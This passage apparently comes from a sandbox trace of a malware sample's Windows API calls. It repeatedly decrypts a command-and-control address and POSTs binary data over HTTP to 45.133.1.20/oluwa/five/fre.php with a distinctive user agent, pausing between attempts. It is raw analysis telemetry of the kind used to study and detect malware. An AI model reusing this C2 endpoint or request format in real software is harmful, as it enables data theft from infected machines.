pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.747] CryptDestroyKey (hKey=0x6ad020) returned 1 [0179.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.749] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0179.749] GetProcessHeap () returned 0x6a0000 [0179.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.750] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0179.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.751] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0179.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.752] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0179.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.754] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0179.754] GetProcessHeap () returned 0x6a0000 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.754] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0179.754] GetProcessHeap () returned 0x6a0000 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0179.754] socket (af=2, type=1, protocol=6) returned 0x3d4 [0179.754] connect (s=0x3d4, name=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0179.783] FreeAddrInfoW (pAddrInfo=0x6bfa58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0179.783] GetProcessHeap () returned 0x6a0000 [0179.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0179.783] GetProcessHeap () returned 0x6a0000 [0179.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0179.784] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.785] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.785] GetProcessHeap () returned 0x6a0000 [0179.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0179.785] GetProcessHeap () returned 0x6a0000 [0179.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.786] GetProcessHeap () returned 0x6a0000 [0179.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0179.786] GetProcessHeap () returned 0x6a0000 [0179.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0179.787] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0179.788] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.788] GetProcessHeap () returned 0x6a0000 [0179.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0179.788] GetProcessHeap () returned 0x6a0000 [0179.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0179.789] send (s=0x3d4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0179.789] send (s=0x3d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0179.790] GetProcessHeap () returned 0x6a0000 [0179.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0179.790] recv (in: s=0x3d4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0179.863] GetProcessHeap () returned 0x6a0000 [0179.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0179.864] GetProcessHeap () returned 0x6a0000 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0179.865] GetProcessHeap () returned 0x6a0000 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0179.865] GetProcessHeap () returned 0x6a0000 [0179.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0179.865] closesocket (s=0x3d4) returned 0 [0179.866] GetProcessHeap () returned 0x6a0000 [0179.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0179.866] GetProcessHeap () returned 0x6a0000 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.867] GetProcessHeap () returned 0x6a0000 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.867] GetProcessHeap () returned 0x6a0000 [0179.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1020) returned 0x3d4 [0179.870] Sleep (dwMilliseconds=0xea60) [0179.871] GetProcessHeap () returned 0x6a0000 [0179.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0179.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.873] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.880] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0179.889] GetProcessHeap () returned 0x6a0000 [0179.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6a28 [0179.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.892] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b6a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.893] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.894] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.894] GetProcessHeap () returned 0x6a0000 [0179.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a28 | out: hHeap=0x6a0000) returned 1 [0179.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.896] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0179.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.897] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.899] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0179.899] GetProcessHeap () returned 0x6a0000 [0179.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.904] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.905] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.906] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.907] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.908] GetProcessHeap () returned 0x6a0000 [0179.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.908] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.908] GetProcessHeap () returned 0x6a0000 [0179.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0179.910] GetProcessHeap () returned 0x6a0000 [0179.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0179.964] GetProcessHeap () returned 0x6a0000 [0179.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0179.965] GetProcessHeap () returned 0x6a0000 [0179.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0179.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0179.982] GetProcessHeap () returned 0x6a0000 [0179.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0179.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.985] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0179.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.986] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.987] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.987] GetProcessHeap () returned 0x6a0000 [0179.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0179.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.989] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0179.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.990] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0179.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0179.991] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0179.991] GetProcessHeap () returned 0x6a0000 [0179.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0179.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.992] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0179.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.993] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0179.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.994] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0179.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0179.995] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0179.995] GetProcessHeap () returned 0x6a0000 [0179.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0179.995] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfaf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0179.995] GetProcessHeap () returned 0x6a0000 [0179.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0179.996] socket (af=2, type=1, protocol=6) returned 0x3d8 [0179.996] connect (s=0x3d8, name=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0180.020] FreeAddrInfoW (pAddrInfo=0x6bfaf8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be8f8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0180.020] GetProcessHeap () returned 0x6a0000 [0180.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0180.020] GetProcessHeap () returned 0x6a0000 [0180.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0180.021] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.022] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.022] GetProcessHeap () returned 0x6a0000 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0180.022] GetProcessHeap () returned 0x6a0000 [0180.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.022] GetProcessHeap () returned 0x6a0000 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0180.022] GetProcessHeap () returned 0x6a0000 [0180.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0180.023] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.024] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.024] GetProcessHeap () returned 0x6a0000 [0180.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0180.024] GetProcessHeap () returned 0x6a0000 [0180.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.025] send (s=0x3d8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0180.025] send (s=0x3d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0180.025] GetProcessHeap () returned 0x6a0000 [0180.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0180.026] recv (in: s=0x3d8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0180.113] GetProcessHeap () returned 0x6a0000 [0180.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0180.114] GetProcessHeap () returned 0x6a0000 [0180.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.114] GetProcessHeap () returned 0x6a0000 [0180.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0180.115] GetProcessHeap () returned 0x6a0000 [0180.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0180.117] closesocket (s=0x3d8) returned 0 [0180.117] GetProcessHeap () returned 0x6a0000 [0180.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0180.117] GetProcessHeap () returned 0x6a0000 [0180.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.118] GetProcessHeap () returned 0x6a0000 [0180.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.118] GetProcessHeap () returned 0x6a0000 [0180.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0180.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1034) returned 0x3d8 [0180.121] Sleep (dwMilliseconds=0xea60) [0180.124] GetProcessHeap () returned 0x6a0000 [0180.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0180.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.133] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0180.142] GetProcessHeap () returned 0x6a0000 [0180.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf5b0 [0180.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.143] CryptImportKey (in: hProv=0x6bec18, pbData=0x6bf5b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0180.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.145] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.145] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.145] GetProcessHeap () returned 0x6a0000 [0180.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf5b0 | out: hHeap=0x6a0000) returned 1 [0180.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.147] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0180.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.148] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0180.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.149] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0180.149] GetProcessHeap () returned 0x6a0000 [0180.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.150] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.153] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.155] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.155] GetProcessHeap () returned 0x6a0000 [0180.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0180.155] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.155] GetProcessHeap () returned 0x6a0000 [0180.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0180.156] GetProcessHeap () returned 0x6a0000 [0180.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.157] GetProcessHeap () returned 0x6a0000 [0180.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.157] GetProcessHeap () returned 0x6a0000 [0180.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0180.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.163] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0180.172] GetProcessHeap () returned 0x6a0000 [0180.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0180.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.173] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0180.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.174] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.175] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.175] GetProcessHeap () returned 0x6a0000 [0180.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0180.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.176] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0180.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.177] CryptDestroyKey (hKey=0x6ad020) returned 1 [0180.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.178] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0180.178] GetProcessHeap () returned 0x6a0000 [0180.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.179] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0180.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.180] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0180.181] LoadLibraryW 